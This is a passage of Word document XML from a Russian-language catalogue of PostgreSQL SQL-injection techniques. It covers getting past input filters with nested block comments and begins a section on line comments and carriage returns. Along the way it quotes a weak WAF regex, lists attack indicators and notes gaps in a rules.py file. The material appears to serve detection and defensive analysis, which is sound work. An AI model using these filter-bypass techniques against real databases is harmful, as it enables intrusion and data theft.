        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446B645" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Стабильно с PG 7.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (когда parser был переписан на flex). Поведение не менялось.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB1EF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSSQL/sqlite/MySQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — non-nested. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>уникальная PG-фича</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> среди major СУБД, что делает 3.12.1 PG-specific.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366F3EB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Требования к среде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C60F01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 7.4+ (все поддерживаемые)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — nested-aware парсер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3A845D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии</w:t>
      </w:r>
      <w:r>
        <w:t>: PUBLIC. 3.12.1 — про обход input-фильтра; целевая атака может требовать любых privileges (см. 3.6, 3.7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4A5F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый sanitizer/log-стриппер</w:t>
      </w:r>
      <w:r>
        <w:t>: основной требование. Если в pipeline только AST-уровневый SQL-валидатор — 3.12.1 не пройдёт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8F1DAB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично self-hosted. Парсер один и тот же.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6971DA0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC6EFA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Условная вложенность в ORM-сгенерированных запросах</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH cte /* hint: materialize */ AS (...) SELECT /* tag: report-2026 */ * FROM cte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — два </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>независимых</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> комментария-метки, не вложенных. Это легитимно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE4A5B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Auto-generated SQL комментарии</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: pgBadger / log-анализаторы вставляют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* user=foo, host=bar */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> префиксы — фиксированный паттерн, не вложенный.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B66BB1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-line block comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: legitimate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* This is a multi-line comment\n with multiple lines\n explaining the query */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — допускает любой текст внутри, но не reads-back nested-marker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E5C10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атака отличается:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452EA7D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   **</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* ... /* ... */ ... */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> структура в payload** — почти всегда обход sanitizer-а.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E95DF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   **Несбалансированные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload** — индикатор атаки на парсер или log-strippere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C58591" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   **</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* ... */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с UNION или DDL keywords внутри** — comment-обёртка опасного SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA21385" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3BB4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 7.4 – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (все поддерживаемые) — nested block comments стабильны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C50E40" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C09D93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F69B3B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.6 (Whitespace tricks)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для обхода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\s+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-regex. Принципиально другой класс задачи, но та же грамматическая фича. Граница закреплена в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conventions.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651F7C58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.0 (WAF категории 3.9)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — содержит правило </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"--|/\*"</w:t>
      </w:r>
      <w:r>
        <w:t>; 3.12.1 — про обход именно этого правила в его слабой форме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F21D28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.2 (`--` и CRLF)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельный класс. 3.12.1 — block comments, 3.12.2 — line comments. Часто комбинируются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A552B32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — после прохождения sanitizer-а, stacked queries для активации второй команды (заблокировано extended-protocol; 3.10.1 — single-command альтернатива).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306708B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 (UNION-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — downstream leak после прохождения через nested-comment-обход.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC51496" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> регекса для несбалансированных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или для nested-comment-паттернов нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. сводный regex категории 3.12 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.12.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B3B7BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539C3083" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — Comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — спецификация nested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FDF88B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL source: src/backend/parser/scan.l (xc state, xcdepth counter)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — реализация.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F34B601" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL standard differences: nested vs flat comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — сравнение с другими СУБД.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436FF1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection — comment-based filter bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE5983B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — comment tricks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0DFF28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.12.2 `--` и переводы строк (`\r`, `\n`, `\r\n`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27024E6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Уязвимый код — см. 3.9.0 (общий WAF с правилом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"--|/\*"</w:t>
      </w:r>
      <w:r>
        <w:t>).**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E870AC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB55F11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-комментарий идёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до конца строки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. PG Lexical Structure §4.1.5: *"A single-line comment is introduced by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and continues to the end of the line (the next newline)."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720CE2CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Что считается «концом строки» — критично:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73657ADB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-парсер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (LF, 0x0A) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CR, 0x0D) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>любой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из них </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>независимо</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обрывает однострочный комментарий. То есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--text\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обрывается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--text\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обрывается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--text\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обрывается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (потом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — уже после конца комментария, просто whitespace).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1727202B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitizer Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value.replace('\r\n', '\n').replace('\r', '\n')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нормализует к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
